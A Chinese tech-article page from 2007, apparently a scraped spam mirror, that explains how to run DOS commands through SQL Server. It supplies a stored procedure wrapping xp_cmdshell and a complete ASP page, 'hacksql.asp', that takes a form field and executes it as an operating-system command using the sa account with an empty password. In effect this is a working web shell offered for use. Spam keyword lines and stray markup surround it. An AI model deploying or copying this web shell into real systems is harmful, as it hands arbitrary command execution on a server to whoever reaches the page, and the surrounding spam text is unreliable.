• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • 利用sql的存儲過程實現dos命令的asp程序

    發表于:2007-07-14來源:作者:點擊數: 標簽:
    1、首先在sql里面你能夠訪問的 數據庫 里面建立存儲過程,比如說:ddy 如下: CREATE PROCEDURE ddy @cmd varchar(50) AS exec master..xp_cmdshell @cmd 2、asp程序里如下:(hacksql.asp) % cmd=trim(Request.Form("cmd")) if cmd"" then work() else sho
    1、首先在sql里面你能夠訪問的數據庫里面建立存儲過程,比如說:ddy
    如下:
    CREATE PROCEDURE ddy
    @cmd varchar(50)
    AS
    exec master..xp_cmdshell @cmd
    2、asp程序里如下:(hacksql.asp)
    <%
    cmd=trim(Request.Form("cmd"))
    if cmd<>"" then
    work()
    else
    show()
    end if
    function work()
    set conn=server.CreateObject("adodb.connection")
    set rs=server.CreateObject("adodb.recordset")
    conn.Open "xx","sa",""
    sql="exec ddy '"&cmd&"'"

    rs.Open sql,conn
    if not rs.EOF then
    do while not rs.eof
    Response.Write "<pre>"&htmlencode2(trim(rs(0)))&"</pre>"
    rs.MoveNext
    loop
    else
    Response.Write "no"
    end if
    if rs.State=1 then rs.close
    set rs=nothing
    conn.Close
    set conn=nothing
    end function
    function show()
    %>
    <form action=hacksql.asp method=post>
    請輸入DOS命令:<input type=text name=cmd>
    <input type=submit value="ok">
    </form>
    <%
    end function
    function htmlencode2(str)'--------轉換函數(為了顯示時比較工整)
    dim result
    dim l
    if isnull(str) then
    htmlencode2=""
    exit function
    end if
    l=len(str)
    result=""
    dim i
    for i = 1 to l
    select case mid(str,i,1)
    case "<"
    result=result+"<"
    case ">"
    result=result+">"
    case chr(34)
    result=result+"""
    case "&"
    result=result+"&"
    case chr(13)
    result=result+"<br>"
    case chr(9)
    result=result+" "
    case "'"
    result=result+"’"
    case chr(32)
    result=result+" "
    if i+1<=l and i-1>0 then
    if mid(str,i+1,1)=chr(32) or mid(str,i+1,1)=chr(9) or mid(str,i-1,1)=chr(32) or mid(str,i-1,1)=chr(9) then
    result=result+" "
    else
    result=result+" "
    end if
    else
    result=result+" "
    end if
    case else
    result=result+mid(str,i,1)
    end select
    next
    htmlencode2=result
    end function
    %>

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>